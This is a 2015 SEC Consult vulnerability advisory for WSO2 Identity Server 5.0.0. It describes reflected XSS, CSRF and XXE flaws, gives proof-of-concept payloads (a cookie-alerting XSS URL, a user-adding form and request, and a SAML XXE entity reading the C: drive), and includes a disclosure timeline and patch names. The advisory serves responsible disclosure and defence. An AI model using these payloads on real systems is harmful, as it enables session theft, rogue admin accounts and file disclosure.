-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

SEC Consult Vulnerability Lab Security Advisory < 20150513-0 >
=======================================================================
              title: Multiple critical vulnerabilities
            product: WSO2 Identity Server
                     other WSO2 Carbon based products may be affected too
 vulnerable version: 5.0.0 (WSO2 Carbon Framework v4.2.0 patch1095)
      fixed version: 5.0.0 with patches 1194 and 1095 applied
         CVE number:
             impact: critical
           homepage: http://wso2.com/products/identity-server/
              found: 2015-02-19
                 by: W. Ettlinger (Office Vienna)
                     SEC Consult Vulnerability Lab

                     An integrated part of SEC Consult
                     Berlin - Frankfurt/Main - Montreal - Singapore
                     Vienna (HQ) - Vilnius - Zurich

                     https://www.sec-consult.com

=======================================================================

Vendor description:
- -------------------
"WSO2 Identity Server provides sophisticated security and identity management
of enterprise web applications, services, and APIs, and makes life easier for
developers and architects with its hassle-free, minimal monitoring and
maintenance requirements. In its latest version, Identity Server acts as an
Enterprise Identity Bus (EIB) — a central backbone to connect and manage
multiple identities regardless of the standards on which they are based."

URL: http://wso2.com/products/identity-server/

Business recommendation:
- ------------------------
The WSO2 Identity Server has three security vulnerabilities that allow an
attacker to take over administrative user sessions and read arbitrary
local files. Moreover, the XXE vulnerability potentially allows an
attacker to conduct further attacks on internal servers since the
vulnerability may allow an attacker to bypass firewall rules.

SEC Consult only conducted a very quick and narrow check on the
WSO2 Identity Server. Since in this check a critical vulnerability was
found, SEC Consult suspects that the Identity Server contains even
more critical vulnerabilities.

Since other WSO2 products are based on the same framework (WSO2 Carbon
Framework), it is possible that these or similar vulnerabilities affect
other products too.

SEC Consult recommends to not use any products based on the WSO2 Carbon
Framework until a thorough security review has been conducted.


Vulnerability overview/description:
- -----------------------------------
1) Reflected cross-site scripting (XSS, IDENTITY-3280)
The WSO2 Identity Server is vulnerable to reflected reflected cross-site
scripting vulnerabilities. An attacker can lure a victim, that is logged in
on the Identity Server administration web interface, to e.g. click on a link
and take over the victim's session.

2) Cross-site request forgery (CSRF, IDENTITY-3280)
On at least on one web page, CSRF protection has not been implemented. An
attacker on the internet could lure a victim, that is logged in on the
Identity Server administration web interface, on a web page e.g. containing
a manipulated <img> tag. The attacker is then able to add arbitrary users
to the Identity Server.

3) XML external entitiy injection (XXE, IDENTITY-3192)
An unauthenticated attacker can use the SAML authentication interface to
inject arbitrary external XML entities. This allows an attacker to read
arbitrary local files. Moreover, since the XML entity resolver allows
remote URLs, this vulnerability may allow to bypass firewall rules
and conduct further attacks on internal hosts.


Proof of concept:
- -----------------
1) Reflected cross-site scripting (XSS, IDENTITY-3280)
When opening the following URL an alert-box is shown as an example:
http://<host>:9443/carbon/user/change-passwd.jsp?isUserChange=true&returnPath=../userstore/index.jsp%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

When a user without permission to create other users issues the following
request, an alert-box is shown:
- ---- snip ----
POST /carbon/user/add-finish.jsp HTTP/1.1
Host: <host>:9443
Cookie: <cookies>
Content-Type: application/x-www-form-urlencoded
Content-Length: 261

pwd_primary_null=%5E%5B%5CS%5D%7B5%2C30%7D%24&usr_primary_null=%5E%5B%5CS%5D%7B3%2C30%7D%24&pwd_PRIMARY=%5E%5B%5CS%5D%7B5%2C30%7D%24&usr_PRIMARY=%5E%5B%5CS%5D%7B3%2C30%7D%24&domain=PRIMARY&username=secconsult&passwordMethod=defineHere&password=test123&retype=test123
- ---- snip ----

2) Cross-site request forgery (CSRF, IDENTITY-3280)
The following HTML fragment demonstrates this issue:
- ---- snip ----
<form method="POST" action="https://<host>:9443/carbon/user/add-finish.jsp">
 <input type="text" name="domain" value="PRIMARY"/>
 <input type="text" name="username" value="secconsult"/>
 <input type="text" name="password" value="test123"/>
 <input type="submit"/>
</form>
- ---- snip ----

3) XML external entitiy injection (XXE, IDENTITY-3192)
After issuing the following request to a vulnerable Windows server,
the contents of the C: drive are returned:

- ---- snip ----
<?xml version="1.0"?>
 <!DOCTYPE AuthnRequest [
  <!ELEMENT AuthnRequest ANY >
  <!ENTITY xxe SYSTEM "file:///C:/" >]>
<samlp:AuthnRequest
	xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"
	Destination="https://<host>/samlsso"
	ID="_ffffffff-0000-0000-0000-ffffffffffff"
	IssueInstant="2015-01-01T01:01:01Z"
	ProtocolBinding="urn:oasis:names:tc:SAML:2.0:bindings:HTTP-POST"
	Version="2.0">
 <saml:Issuer xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion">
  XXXX&xxe;YYYY
 </saml:Issuer>
 <samlp:NameIDPolicy AllowCreate="true"
	Format="urn:oasis:names:tc:SAML:2.0:nameid-format:transient"/>
</samlp:AuthnRequest>
- ---- snip ----


Vulnerable / tested versions:
- -----------------------------
The version 5.0.0 (with WSO2 Carbon Framework v4.2.0 patch1095 applied)
was found to be vulnerable. This was the latest version at the time
of discovery.


Vendor contact timeline:
- ------------------------
2015-03-19: Contacting vendor through security@wso2.com
2015-03-19: Security contact confirms retrieval of the E-Mail
2015-03-19: Security contact says that he has trouble opening the attached PDF
            document
2015-03-19: Sending Responsible Disclosure Policy in plain text
2015-03-20: Security contact states he actually was unable to decrypt the
            advisory
2015-03-22: Sending security advisory again
2015-03-22: Security contact confirms retrieval of the advisory
2015-03-26: Security contact acknowledges existence of the vulnerabilities
2015-04-10: Asking for an update on the current status and which products and
            versions are affected
2015-04-10: Security contact: XSS vulnerabilities are fixed in the code,
            fixing CSRF is in progress,
            Identity Server 5.0.0 is vulnerable
2015-04-13: Asking whether the patches will be release before the latest
            possible release date; asking for the status of the XXE
            vulnerability and whether other products based on Carbon are
            affected
2015-04-13: Advisory can be release on 2013-05-07, release notes will mention
            the affected products
2015-05-04: Asking for current status
2015-05-04: Security contact: patches will be released in the next couple of
            days
2015-05-05: Security contact asks to delay the release of the advisory to
            2013-05-13
2015-05-05: Confirming the new release date
2015-05-05: Asking to give credit in the release notes to the patch
2015-05-13: Public release of the advisory


Solution:
- ---------
Apply the following patches to mitigate these issues:
 * WSO2-CARBON-PATCH-4.2.0-1194
 * WSO2-CARBON-PATCH-4.2.0-1095

See the following pages for more information:
https://wso2.org/jira/browse/IDENTITY-3280
https://wso2.org/jira/browse/IDENTITY-3192

The patches can be downloaded at
http://wso2.com/products/identity-server/

Workaround:
- -----------
None.


Advisory URL:
- -------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Berlin - Frankfurt/Main - Montreal - Singapore - Vienna (HQ) - Vilnius - Zurich

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/Career.htm

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/About/Contact.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF W. Ettlinger / @2015
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (MingW32)

iQIcBAEBAgAGBQJVUx2MAAoJEC0t17XG7og/H/4QAIiwOLbldpFKkJwemTc5qxeu
LSIgJjMy9Yz7HZtu1c65QAPJQ6B+VduU+bN3Lt10AHAWYPTtyjFlQzq4MrcUWaY8
XiO4pA4nYykki9F8QUp1cBX9bfzihqHR/1+sqELJ/ueiz8U4wzUPW31UehTdjV26
d+SZ0FdVPi1BlJb3Ex0ejkxkDB4a9kVYswxu0zti8oZcaXZ++TYdCssssAaA+Vu4
aPErIQMfaXSoeZlJS7f8TYRRR9p2fVJBsXr29CgG9GJBz0DMExF8AKZ+Ve0EJd8u
y2mKPwJgtzLN7Crw1YfD6YoSaTbygdDqFs208VDwAEP5Gh7N19ylhpUdJkgKk56l
jzo+DmqVt9j5R2gu1Nc8+3ienuQ9v6xs5WlOWJC5/2Gh9ngOH31jEZTG2oqjLDxW
pqsXnqG6FEW1qbbB+UCebI3bseqLGJJQQVqYeENh9zX1m82PTuRy9QQDcyXlzl4q
hZksURglFjGwwgahTgR8LVO5kAivqbsahp/IojxSwc0DnceC8NJjYE/qprv+NOG0
2sud3X9AhrlJcwfNMWb795Jgv2fDjox1yu8Noga67a2muz9UwbTJXZKSyn32IpEe
aYQtgSXTT0YaidP7HDUcsuTIhGczL8PGilDCuNRDy2UF0eFHqaj1d9Ou9QSturnn
wu/AhxURurrsfOEg1TMs
=iuLH
-----END PGP SIGNATURE-----